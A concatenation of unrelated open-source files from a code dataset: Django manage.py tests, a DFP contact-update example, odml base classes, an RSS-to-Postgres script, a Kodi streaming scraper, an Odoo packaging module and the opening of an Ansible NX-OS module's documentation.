"alternate: manage.py can't execute user commands, even if settings are provided as argument"
args = ['noargs_command', '--settings=alternate_settings']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
def test_custom_command_with_environment(self):
"alternate: manage.py can't execute user commands, even if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_manage(args,'alternate_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Can't find the file 'settings.py' in the directory containing './manage.py'")
class ManageMultipleSettings(AdminScriptTestCase):
"""A series of tests for manage.py when multiple settings files
(including the default 'settings.py') are available. The default settings
file is insufficient for performing the operations described, so the
alternate settings must be used by the running script.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth','django.contrib.contenttypes'])
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('settings.py')
self.remove_settings('alternate_settings.py')
def test_builtin_command(self):
"multiple: manage.py builtin commands fail with an import error when no settings provided"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, 'App with label admin_scripts could not be found.')
def test_builtin_with_settings(self):
"multiple: manage.py builtin commands succeed if settings are provided as argument"
args = ['sqlall','--settings=alternate_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, 'CREATE TABLE')
def test_builtin_with_environment(self):
"multiple: manage.py builtin commands fail if settings are provided in the environment"
# FIXME: This doesn't seem to be the correct output.
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args,'alternate_settings')
self.assertNoOutput(out)
self.assertOutput(err, 'App with label admin_scripts could not be found.')
def test_builtin_with_bad_settings(self):
"multiple: manage.py builtin commands fail if settings file (from argument) doesn't exist"
args = ['sqlall','--settings=bad_settings', 'admin_scripts']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Could not import settings 'bad_settings'")
def test_builtin_with_bad_environment(self):
"multiple: manage.py builtin commands fail if settings file (from environment) doesn't exist"
args = ['sqlall','admin_scripts']
out, err = self.run_manage(args,'bad_settings')
self.assertNoOutput(out)
self.assertOutput(err, "App with label admin_scripts could not be found")
def test_custom_command(self):
"multiple: manage.py can't execute user commands using default settings"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
def test_custom_command_with_settings(self):
"multiple: manage.py can execute user commands if settings are provided as argument"
args = ['noargs_command', '--settings=alternate_settings']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:NoArgsCommand")
def test_custom_command_with_environment(self):
"multiple: manage.py can execute user commands if settings are provided in environment"
args = ['noargs_command']
out, err = self.run_manage(args,'alternate_settings')
self.assertNoOutput(out)
self.assertOutput(err, "Unknown command: 'noargs_command'")
##########################################################################
# COMMAND PROCESSING TESTS
# Check that user-space commands are correctly handled - in particular,
# that arguments to the commands are correctly parsed and processed.
##########################################################################
class CommandTypes(AdminScriptTestCase):
"Tests for the various types of base command types that can be defined."
def setUp(self):
self.write_settings('settings.py')
def tearDown(self):
self.remove_settings('settings.py')
def test_version(self):
"--version is handled as a special case"
args = ['--version']
out, err = self.run_manage(args)
self.assertNoOutput(err)
# Only check the first part of the version number
self.assertOutput(out, get_version().split('-')[0])
def test_help(self):
"--help is handled as a special case"
args = ['--help']
out, err = self.run_manage(args)
if sys.version_info < (2, 5):
self.assertOutput(out, "usage: manage.py [options]")
else:
self.assertOutput(out, "Usage: manage.py [options]")
self.assertOutput(err, "Type 'manage.py help <subcommand>' for help on a specific subcommand.")
def test_specific_help(self):
"--help can be used on a specific command"
args = ['sqlall','--help']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "Prints the CREATE TABLE, custom SQL and CREATE INDEX SQL statements for the given model module name(s).")
def test_base_command(self):
"User BaseCommands can execute when a label is provided"
args = ['base_command','testlabel']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel',), options=[('option_a', '1'), ('option_b', '2'), ('option_c', '3'), ('pythonpath', None), ('settings', None), ('traceback', None)]")
def test_base_command_no_label(self):
"User BaseCommands can execute when no labels are provided"
args = ['base_command']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=(), options=[('option_a', '1'), ('option_b', '2'), ('option_c', '3'), ('pythonpath', None), ('settings', None), ('traceback', None)]")
def test_base_command_multiple_label(self):
"User BaseCommands can execute when no labels are provided"
args = ['base_command','testlabel','anotherlabel']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel', 'anotherlabel'), options=[('option_a', '1'), ('option_b', '2'), ('option_c', '3'), ('pythonpath', None), ('settings', None), ('traceback', None)]")
def test_base_command_with_option(self):
"User BaseCommands can execute with options when a label is provided"
args = ['base_command','testlabel','--option_a=x']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel',), options=[('option_a', 'x'), ('option_b', '2'), ('option_c', '3'), ('pythonpath', None), ('settings', None), ('traceback', None)]")
def test_base_command_with_options(self):
"User BaseCommands can execute with multiple options when a label is provided"
args = ['base_command','testlabel','-a','x','--option_b=y']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel',), options=[('option_a', 'x'), ('option_b', 'y'), ('option_c', '3'), ('pythonpath', None), ('settings', None), ('traceback', None)]")
def test_noargs(self):
"NoArg Commands can be executed"
args = ['noargs_command']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:NoArgsCommand options=[('pythonpath', None), ('settings', None), ('traceback', None)]")
def test_noargs_with_args(self):
"NoArg Commands raise an error if an argument is provided"
args = ['noargs_command','argument']
out, err = self.run_manage(args)
self.assertOutput(err, "Error: Command doesn't accept any arguments")
def test_app_command(self):
"User AppCommands can execute when a single app name is provided"
args = ['app_command', 'auth']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:AppCommand app=<module 'django.contrib.auth.models'")
self.assertOutput(out, os.sep.join(['django','contrib','auth','models.py']))
self.assertOutput(out, "'>, options=[('pythonpath', None), ('settings', None), ('traceback', None)]")
def test_app_command_no_apps(self):
"User AppCommands raise an error when no app name is provided"
args = ['app_command']
out, err = self.run_manage(args)
self.assertOutput(err, 'Error: Enter at least one appname.')
def test_app_command_multiple_apps(self):
"User AppCommands raise an error when multiple app names are provided"
args = ['app_command','auth','contenttypes']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:AppCommand app=<module 'django.contrib.auth.models'")
self.assertOutput(out, os.sep.join(['django','contrib','auth','models.pyc']) + "'>, options=[('pythonpath', None), ('settings', None), ('traceback', None)]")
self.assertOutput(out, "EXECUTE:AppCommand app=<module 'django.contrib.contenttypes.models'")
self.assertOutput(out, os.sep.join(['django','contrib','contenttypes','models.py']))
self.assertOutput(out, "'>, options=[('pythonpath', None), ('settings', None), ('traceback', None)]")
def test_app_command_invalid_appname(self):
"User AppCommands can execute when a single app name is provided"
args = ['app_command', 'NOT_AN_APP']
out, err = self.run_manage(args)
self.assertOutput(err, "App with label NOT_AN_APP could not be found")
def test_app_command_some_invalid_appnames(self):
"User AppCommands can execute when some of the provided app names are invalid"
args = ['app_command', 'auth', 'NOT_AN_APP']
out, err = self.run_manage(args)
self.assertOutput(err, "App with label NOT_AN_APP could not be found")
def test_label_command(self):
"User LabelCommands can execute when a label is provided"
args = ['label_command','testlabel']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:LabelCommand label=testlabel, options=[('pythonpath', None), ('settings', None), ('traceback', None)]")
def test_label_command_no_label(self):
"User LabelCommands raise an error if no label is provided"
args = ['label_command']
out, err = self.run_manage(args)
self.assertOutput(err, 'Enter at least one label')
def test_label_command_multiple_label(self):
"User LabelCommands are executed multiple times if multiple labels are provided"
args = ['label_command','testlabel','anotherlabel']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:LabelCommand label=testlabel, options=[('pythonpath', None), ('settings', None), ('traceback', None)]")
self.assertOutput(out, "EXECUTE:LabelCommand label=anotherlabel, options=[('pythonpath', None), ('settings', None), ('traceback', None)]")
class ArgumentOrder(AdminScriptTestCase):
"""Tests for 2-stage argument parsing scheme.
django-admin command arguments are parsed in 2 parts; the core arguments
(--settings, --traceback and --pythonpath) are parsed using a Lax parser.
This Lax parser ignores any unknown options. Then the full settings are
passed to the command parser, which extracts commands of interest to the
individual command.
"""
def setUp(self):
self.write_settings('settings.py', apps=['django.contrib.auth','django.contrib.contenttypes'])
self.write_settings('alternate_settings.py')
def tearDown(self):
self.remove_settings('settings.py')
self.remove_settings('alternate_settings.py')
def test_setting_then_option(self):
"Options passed after settings are correctly handled"
args = ['base_command','testlabel','--settings=alternate_settings','--option_a=x']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel',), options=[('option_a', 'x'), ('option_b', '2'), ('option_c', '3'), ('pythonpath', None), ('settings', 'alternate_settings'), ('traceback', None)]")
def test_setting_then_short_option(self):
"Short options passed after settings are correctly handled"
args = ['base_command','testlabel','--settings=alternate_settings','--option_a=x']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel',), options=[('option_a', 'x'), ('option_b', '2'), ('option_c', '3'), ('pythonpath', None), ('settings', 'alternate_settings'), ('traceback', None)]")
def test_option_then_setting(self):
"Options passed before settings are correctly handled"
args = ['base_command','testlabel','--option_a=x','--settings=alternate_settings']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel',), options=[('option_a', 'x'), ('option_b', '2'), ('option_c', '3'), ('pythonpath', None), ('settings', 'alternate_settings'), ('traceback', None)]")
def test_short_option_then_setting(self):
"Short options passed before settings are correctly handled"
args = ['base_command','testlabel','-a','x','--settings=alternate_settings']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel',), options=[('option_a', 'x'), ('option_b', '2'), ('option_c', '3'), ('pythonpath', None), ('settings', 'alternate_settings'), ('traceback', None)]")
def test_option_then_setting_then_option(self):
"Options are correctly handled when they are passed before and after a setting"
args = ['base_command','testlabel','--option_a=x','--settings=alternate_settings','--option_b=y']
out, err = self.run_manage(args)
self.assertNoOutput(err)
self.assertOutput(out, "EXECUTE:BaseCommand labels=('testlabel',), options=[('option_a', 'x'), ('option_b', 'y'), ('option_c', '3'), ('pythonpath', None), ('settings', 'alternate_settings'), ('traceback', None)]")
| agpl-3.0 | 365,962,058,021,763,840 | 47.258772 | 221 | 0.655821 | false |
cctaylor/googleads-python-lib | examples/dfp/v201408/contact_service/update_contacts.py | 4 | 2527 | #!/usr/bin/python
#
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example updates contact addresses.
To determine which contacts exist, run get_all_contacts.py.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
Tags: ContactService.updateContacts
ContactService.getContactsByStatement
"""
__author__ = ('Nicholas Chen',
'Joseph DiLallo')
# Import appropriate modules from the client library.
from googleads import dfp
# Set the ID of the contact to update.
CONTACT_ID = 'INSERT_CONTACT_ID_HERE'
def main(client, contact_id):
# Initialize appropriate service.
contact_service = client.GetService('ContactService', version='v201408')
# Create statement object to select the single contact by ID.
values = [{
'key': 'id',
'value': {
'xsi_type': 'NumberValue',
'value': contact_id
}
}]
query = 'WHERE id = :id'
statement = dfp.FilterStatement(query, values, 1)
# Get contacts by statement.
response = contact_service.getContactsByStatement(
statement.ToStatement())
if 'results' in response:
updated_contacts = []
for contact in response['results']:
contact['address'] = '123 New Street, New York, NY, 10011'
updated_contacts.append(contact)
# Update the contact on the server.
contacts = contact_service.updateContacts(updated_contacts)
# Display results.
for contact in contacts:
print (('Contact with ID \'%s\', name \'%s\', and address \'%s\' '
'was updated.')
% (contact['id'], contact['name'], contact['address']))
else:
print 'No contacts found to update.'
if __name__ == '__main__':
# Initialize client object.
dfp_client = dfp.DfpClient.LoadFromStorage()
main(dfp_client, CONTACT_ID)
| apache-2.0 | -2,064,936,080,641,870,000 | 30.987342 | 77 | 0.696082 | false |
carloscanova/python-odml | odml/base.py | 2 | 16824 | #-*- coding: utf-8
"""
collects common base functionality
"""
import doc
import posixpath
import terminology
import mapping
from tools.doc_inherit import *
class _baseobj(object):
pass
class baseobject(_baseobj):
_format = None
@property
def document(self):
"""returns the Document object in which this object is contained"""
if self.parent is None:
return None
return self.parent.document
def get_terminology_equivalent(self):
"""
returns the equivalent object in an terminology (should there be one
defined) or None
"""
return None
def __eq__(self, obj):
"""
do a deep comparison of this object and its odml properties
"""
# cannot compare totally different stuff
if not isinstance(obj, _baseobj):
return False
if not isinstance(self, obj.__class__):
return False
for key in self._format:
if getattr(self, key) != getattr(obj, key):
return False
return True
def __ne__(self, obj):
"""
use the __eq__ function to determine if both objects are equal
"""
return not self == obj
def clean(self):
"""
stub that doesn't do anything for this class
"""
pass
def clone(self, children=True):
"""
clone this object recursively (if children is True) allowing to copy it independently
to another document. If children is False, this acts as a template cloner, creating
a copy of the object without any children
"""
# TODO don't we need some recursion / deepcopy here?
import copy
obj = copy.copy(self)
return obj
def _reorder(self, childlist, new_index):
l = childlist
old_index = l.index(self)
# 2 cases: insert after old_index / insert before
if new_index > old_index:
new_index += 1
l.insert(new_index, self)
if new_index < old_index:
del l[old_index+1]
else:
del l[old_index]
return old_index
def reorder(self, new_index):
"""
move this object in its parent child-list to the position *new_index*
returns the old index at which the object was found
"""
raise NotImplementedError
class SafeList(list):
def index(self, obj):
"""
find obj in list
be sure to use "is" based comparison (instead of __eq__)
"""
for i, e in enumerate(self):
if e is obj:
return i
raise ValueError("remove: %s not in list" % repr(obj))
def remove(self, obj):
"""
remove an element from this list
be sure to use "is" based comparison (instead of __eq__)
"""
del self[self.index(obj)]
class SmartList(SafeList):
def __getitem__(self, key):
"""
provides element index also by searching for an element with a given name
"""
# try normal list index first (for integers)
if type(key) is int:
return super(SmartList, self).__getitem__(key)
# otherwise search the list
for obj in self:
if (hasattr(obj, "name") and obj.name == key) or key == obj:
return obj
# and fail eventually
raise KeyError(key)
def __contains__(self, key):
for obj in self:
if (hasattr(obj, "name") and obj.name == key) or key == obj:
return True
def append(self, obj):
if obj.name in self:
raise KeyError("Object with the same name already exists! " + str(obj))
else:
super(SmartList, self).append(obj)
@allow_inherit_docstring
class sectionable(baseobject, mapping.mapped):
def __init__(self):
self._sections = SmartList()
self._repository = None
@property
def document(self):
"""
returns the parent-most node (if its a document instance) or None
"""
p = self
while p.parent:
p = p.parent
if isinstance(p, doc.Document):
return p
@property
def sections(self):
"""the list of sections contained in this section/document"""
return self._sections
@mapping.remapable_insert
def insert(self, position, section):
"""
adds the section to the section-list and makes this document the section’s parent
currently just appends the section and does not insert at the specified *position*
"""
self._sections.append(section)
section._parent = self
@mapping.remapable_append
def append(self, section):
"""adds the section to the section-list and makes this document the section’s parent"""
self._sections.append(section)
section._parent = self
@inherit_docstring
def reorder(self, new_index):
return self._reorder(self.parent.sections, new_index)
@mapping.remapable_remove
def remove(self, section):
"""removes the specified child-section"""
self._sections.remove(section)
section._parent = None
def __getitem__(self, key):
return self._sections[key]
def __len__(self):
return len(self._sections)
def __iter__(self):
return self._sections.__iter__()
def itersections(self, recursive=True, yield_self=False, filter_func=lambda x: True, max_depth=None):
"""
iterate each child section
>>> # example: return all subsections which name contains "foo"
>>> filter_func = lambda x: getattr(x, 'name').find("foo") > -1
>>> sec_or_doc.itersections(filter_func=filter_func)
:param recursive: iterate all child sections recursively (deprecated)
:type recursive: bool
:param yield_self: includes itself in the iteration
:type yield_self: bool
:param filter_func: accepts a function that will be applied to each iterable. Yields
iterable if function returns True
:type filter_func: function
"""
stack = []
# below: never yield self if self is a Document
if self == self.document and (max_depth > 0 or max_depth is None):
for sec in self.sections:
stack.append((sec, 1)) # (<section>, <level in a tree>)
elif not self == self.document:
stack.append((self, 0)) # (<section>, <level in a tree>)
while len(stack) > 0:
(sec, level) = stack.pop(0)
if filter_func(sec) and (yield_self if level == 0 else True):
yield sec
if max_depth is None or level < max_depth:
for sec in sec.sections:
stack.append((sec, level + 1))
def iterproperties(self, max_depth=None, filter_func=lambda x: True):
"""
iterate each related property (recursively)
>>> # example: return all children properties which name contains "foo"
>>> filter_func = lambda x: getattr(x, 'name').find("foo") > -1
>>> sec_or_doc.iterproperties(filter_func=filter_func)
:param max_depth: iterate all properties recursively if None, only to a certain
level otherwise
:type max_depth: bool
:param filter_func: accepts a function that will be applied to each iterable. Yields
iterable if function returns True
:type filter_func: function
"""
for sec in [s for s in self.itersections(max_depth=max_depth, yield_self=True)]:
if hasattr(sec, "properties"): # not to fail if odml.Document
for i in sec.properties:
if filter_func(i):
yield i
def itervalues(self, max_depth=None, filter_func=lambda x: True):
"""
iterate each related value (recursively)
>>> # example: return all children values which string converted version has "foo"
>>> filter_func = lambda x: str(getattr(x, 'data')).find("foo") > -1
>>> sec_or_doc.itervalues(filter_func=filter_func)
:param max_depth: iterate all properties recursively if None, only to a certain
level otherwise
:type max_depth: bool
:param filter_func: accepts a function that will be applied to each iterable. Yields
iterable if function returns True
:type filter_func: function
"""
for prop in [p for p in self.iterproperties(max_depth=max_depth)]:
for v in prop.values:
if filter_func(v):
yield v
def contains(self, obj):
"""
checks if a subsection of name&type of *obj* is a child of this section
if so return this child
"""
for i in self._sections:
if obj.name == i.name and obj.type == i.type:
return i
def _matches(self, obj, key=None, type=None, include_subtype=False):
"""
find out
* if the *key* matches obj.name (if key is not None)
* or if *type* matches obj.type (if type is not None)
* if type does not match exactly, test for subtype. (e.g.stimulus/white_noise)
comparisons are case-insensitive, however both key and type
MUST be lower-case.
"""
name_match = (key is None or (key is not None and hasattr(obj, "name") and obj.name == key))
exact_type_match = (type is None or (type is not None and hasattr(obj, "type") and obj.type.lower() == type))
if not include_subtype:
return name_match and exact_type_match
subtype_match = type is None or (type is not None and hasattr(obj, "type") and
type in obj.type.lower().split('/')[:-1])
return name_match and (exact_type_match or subtype_match)
def get_section_by_path(self, path):
"""
find a Section through a path like "../name1/name2"
:param path: path like "../name1/name2"
:type path: str
"""
return self._get_section_by_path(path)
def get_property_by_path(self, path):
"""
find a Property through a path like "../name1/name2:property_name"
:param path: path like "../name1/name2:property_name"
:type path: str
"""
laststep = path.split(":") # assuming section names do not contain :
found = self._get_section_by_path(laststep[0])
return self._match_iterable(found.properties, ":".join(laststep[1:]))
def _match_iterable(self, iterable, key):
"""
Searches for a key match within a given iterable.
Raises ValueError if not found.
"""
for obj in iterable:
if self._matches(obj, key):
return obj
raise ValueError("Object named '%s' does not exist" % key)
def _get_section_by_path(self, path):
"""
Returns a Section by a given path.
Raises ValueError if not found.
"""
if path.startswith("/"):
if len(path) == 1:
raise ValueError("Not a valid path")
doc = self.document
if doc is not None:
return doc._get_section_by_path(path[1:])
raise ValueError("A section with no Document cannot resolve absolute path")
pathlist = path.split("/")
if len(pathlist) > 1:
if pathlist[0] == "..":
found = self.parent
elif pathlist[0] == ".":
found = self
else:
found = self._match_iterable(self.sections, pathlist[0])
if found:
return found._get_section_by_path("/".join(pathlist[1:]))
raise ValueError("Section named '%s' does not exist" % pathlist[0])
else:
return self._match_iterable(self.sections, pathlist[0])
def find(self, key=None, type=None, findAll=False, include_subtype=False):
"""return the first subsection named *key* of type *type*"""
ret = []
if type:
type = type.lower()
for s in self._sections:
if self._matches(s, key, type, include_subtype=include_subtype):
if findAll:
ret.append(s)
else:
return s
if ret:
return ret
def find_related(self, key=None, type=None, children=True, siblings=True, parents=True, recursive=True, findAll=False):
"""
finds a related section named *key* and/or *type*
* by searching its children’s children if *children* is True
if *recursive* is true all leave nodes will be searched
* by searching its siblings if *siblings* is True
* by searching the parent element if *parents* is True
if *recursive* is True all parent nodes until the root are searched
* if *findAll* is True, returns a list of all matching objects
"""
ret = []
if type:
type = type.lower()
if children:
for section in self._sections:
if self._matches(section, key, type):
if findAll:
ret.append(section)
else:
return section
if recursive:
obj = section.find_related(key, type, children, siblings=False, parents=False, recursive=recursive, findAll=findAll)
if obj is not None:
if findAll:
ret += obj
else:
return obj
if siblings and self.parent is not None:
obj = self.parent.find(key, type, findAll)
if obj is not None:
if findAll:
ret += obj
else:
return obj
if parents:
obj = self
while obj.parent is not None:
obj = obj.parent
if self._matches(obj, key, type):
if findAll:
ret.append(obj)
else:
return obj
if not recursive: break
if ret:
return ret
return None
def get_path(self):
"""
returns the absolute path of this section
"""
node = self
path = []
while node.parent is not None:
path.insert(0, node.name)
node = node.parent
return "/" + "/".join(path)
@staticmethod
def _get_relative_path(a, b):
"""
returns a relative path for navigation from dir *a* to dir *b*
if the common parent of both is "/", return an absolute path
"""
a += "/"
b += "/"
parent = posixpath.dirname(posixpath.commonprefix([a,b]))
if parent == "/": return b[:-1]
a = posixpath.relpath(a, parent)
b = posixpath.relpath(b, parent)
if a == ".": return b
return posixpath.normpath("../" * (a.count("/")+1) + b)
def get_relative_path(self, section):
"""
returns a relative (file)path to point to section (e.g. ../other_section)
if the common parent of both sections is the document (i.e. /), return an absolute path
"""
a = self.get_path()
b = section.get_path()
return self._get_relative_path(a,b)
def clean(self):
"""
Runs clean() on all immediate child-sections causing any resolved links
or includes to be unresolved.
This should be called for the document prior to saving.
"""
for i in self:
i.clean()
def clone(self, children=True):
"""
clone this object recursively allowing to copy it independently
to another document
"""
obj = super(sectionable, self).clone(children)
obj._parent = None
obj._sections = SmartList()
if children:
for s in self._sections:
obj.append(s.clone())
return obj
@property
def repository(self):
"""An url to a terminology."""
return self._repository
@repository.setter
def repository(self, url):
if not url: url = None
self._repository = url
if url:
terminology.deferred_load(url)
def get_repository(self):
"""
return the current applicable repository (may be inherited from a
parent) or None
"""
return self._repository
| bsd-3-clause | -5,420,977,738,541,653,000 | 32.041257 | 136 | 0.553574 | false |
mtracy/News-Aggregation | src/readRSS.py | 1 | 1837 | import psycopg2
import sys
import json
import sys
import feedparser
import time
import graphParser
username = sys.argv[1]
pword = sys.argv[2]
url = sys.argv[3]
publisher = sys.argv[4]
subject = sys.argv[5]
refresh = float(sys.argv[6])
def checkDB(title):
cur.execute("SELECT * FROM stories WHERE title = %s;", (title,))
results = cur.fetchall()
if len(results) > 0:
return 1
return 0
try:
conn=psycopg2.connect(database='news', user=username, host='localhost', password=pword)
except Exception as e:
print("I am unable to connect to the database.")
print(e)
cur = conn.cursor()
print("connection to DB established")
feed = feedparser.parse(url)
if(feed.bozo == 1):
print("the url does not contain a well formed RSS")
sys.exit(-1)
print(feed.feed.title)
while(1):
for post in feed.entries:
title = post.title
if checkDB(title) == 1:
#print("skipping " + title)
break
else:
#string = title + ", " + post.published + ", " + post.links[0].href + ", " + post.summary + ", " + post.media_content[0]['url']
#print(string)
print("insterting " + title)
try:
media = post.media_content[0]['url']
except Exception as e:
media = ""
summary = post.summary.split("<")[0]
if len(summary) > 0:
path = graphParser.getPath(summary)
else:
path = graphParser.getPath(title)
print(summary)
print(path)
print("--------")
cur.execute("INSERT INTO stories (title, source, subject, taxonomy, pubtime, link, summary, media) VALUES (%s, %s, %s, %s, %s, %s, %s, %s);", (title, publisher, subject, path, post.published, post.links[0].href, summary, media))
conn.commit()
time.sleep(refresh)
| mit | -6,796,271,105,562,539,000 | 26.833333 | 240 | 0.592814 | false |
JamesLinEngineer/RKMC | addons/plugin.video.phstreams/resources/lib/sources/ororo_mv_tv.py | 2 | 4547 | # -*- coding: utf-8 -*-
'''
Exodus Add-on
Copyright (C) 2016 Exodus
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urlparse,json,base64
from resources.lib.modules import cache
from resources.lib.modules import control
from resources.lib.modules import client
class source:
def __init__(self):
self.domains = ['ororo.tv']
self.base_link = 'https://ororo.tv'
self.moviesearch_link = '/api/v2/movies'
self.tvsearch_link = '/api/v2/shows'
self.movie_link = '/api/v2/movies/%s'
self.show_link = '/api/v2/shows/%s'
self.episode_link = '/api/v2/episodes/%s'
self.user = control.setting('ororo.user')
self.password = control.setting('ororo.pass')
self.headers = {
'Authorization': 'Basic %s' % base64.b64encode('%s:%s' % (self.user, self.password)),
'User-Agent': 'Exodus for Kodi'
}
def movie(self, imdb, title, year):
try:
if (self.user == '' or self.password == ''): raise Exception()
url = cache.get(self.ororo_moviecache, 60, self.user)
url = [i[0] for i in url if imdb == i[1]][0]
url= self.movie_link % url
return url
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, year):
try:
if (self.user == '' or self.password == ''): raise Exception()
url = cache.get(self.ororo_tvcache, 120, self.user)
url = [i[0] for i in url if imdb == i[1]][0]
url= self.show_link % url
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if (self.user == '' or self.password == ''): raise Exception()
if url == None: return
url = urlparse.urljoin(self.base_link, url)
r = client.request(url, headers=self.headers)
r = json.loads(r)['episodes']
r = [(str(i['id']), str(i['season']), str(i['number']), str(i['airdate'])) for i in r]
url = [i for i in r if season == '%01d' % int(i[1]) and episode == '%01d' % int(i[2])]
url += [i for i in r if premiered == i[3]]
url= self.episode_link % url[0][0]
return url
except:
return
def ororo_moviecache(self, user):
try:
url = urlparse.urljoin(self.base_link, self.moviesearch_link)
r = client.request(url, headers=self.headers)
r = json.loads(r)['movies']
r = [(str(i['id']), str(i['imdb_id'])) for i in r]
r = [(i[0], 'tt' + re.sub('[^0-9]', '', i[1])) for i in r]
return r
except:
return
def ororo_tvcache(self, user):
try:
url = urlparse.urljoin(self.base_link, self.tvsearch_link)
r = client.request(url, headers=self.headers)
r = json.loads(r)['shows']
r = [(str(i['id']), str(i['imdb_id'])) for i in r]
r = [(i[0], 'tt' + re.sub('[^0-9]', '', i[1])) for i in r]
return r
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None: return sources
if (self.user == '' or self.password == ''): raise Exception()
url = urlparse.urljoin(self.base_link, url)
url = client.request(url, headers=self.headers)
url = json.loads(url)['url']
sources.append({'source': 'ororo', 'quality': 'HD', 'provider': 'Ororo', 'url': url, 'direct': True, 'debridonly': False})
return sources
except:
return sources
def resolve(self, url):
return url
| gpl-2.0 | 5,996,479,877,914,455,000 | 29.797203 | 134 | 0.531779 | false |
Endika/odoomrp-wip | product_packaging_through_attributes/models/product.py | 25 | 1192 | # -*- coding: utf-8 -*-
##############################################################################
# For copyright and license notices, see __openerp__.py file in root directory
##############################################################################
from openerp import models, fields, api
class ProductAttribute(models.Model):
_inherit = 'product.attribute'
is_package = fields.Boolean(string='Is package')
class ProductAttributeValue(models.Model):
_inherit = 'product.attribute.value'
is_package_attr = fields.Boolean(
string='Package attribute', related='attribute_id.is_package')
package_product = fields.Many2one(
comodel_name='product.product', string='Package Product',
context="{'default_sale_ok': False, 'default_purchase_ok': False}")
class ProductPackaging(models.Model):
_inherit = 'product.packaging'
product = fields.Many2one(
comodel_name='product.product', string='Package Product',
context="{'default_sale_ok': False, 'default_purchase_ok': False}")
@api.one
@api.onchange('product')
def onchange_product(self):
self.product_tmpl_id = self.product.product_tmpl_id
| agpl-3.0 | -6,261,274,071,126,351,000 | 33.057143 | 78 | 0.594799 | false |
amenonsen/ansible | lib/ansible/modules/network/nxos/_nxos_l2_interface.py | 3 | 19166 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2017, Ansible by Red Hat, inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['deprecated'],
'supported_by': 'network'}
DOCUMENTATION = """
---
module: nxos_l2_interface
extends_documentation_fragment: nxos
version_added: "2.5"
short_description: Manage Layer-2 interface on Cisco NXOS devices.
description:
- This module provides declarative management of Layer-2 interface on
Cisco NXOS devices.
deprecated:
removed_in: '2.13'
alternative: nxos_l2_interfaces
why: Updated modules released with more functionality
author:
- Trishna Guha (@trishnaguha)
notes:
- Tested against NXOSv 7.0(3)I5(1).
options:
name:
description:
- Full name of the interface excluding any logical
unit number, i.e. Ethernet1/1.
required: true
aliases: ['interface']
mode:
description:
- Mode in which interface needs to be configured.
choices: ['access','trunk']
access_vlan:
description:
- Configure given VLAN in access port.
If C(mode=access), used as the access VLAN ID.
native_vlan:
description:
- Native VLAN to be configured in trunk port.
If C(mode=trunk), used as the trunk native VLAN ID.
trunk_vlans:
description:
- List of VLANs to be configured in trunk port.
If C(mode=trunk), used as the VLAN range to ADD or REMOVE
from the trunk.
aliases: ['trunk_add_vlans']
trunk_allowed_vlans:
description:
- List of allowed VLANs in a given trunk port.
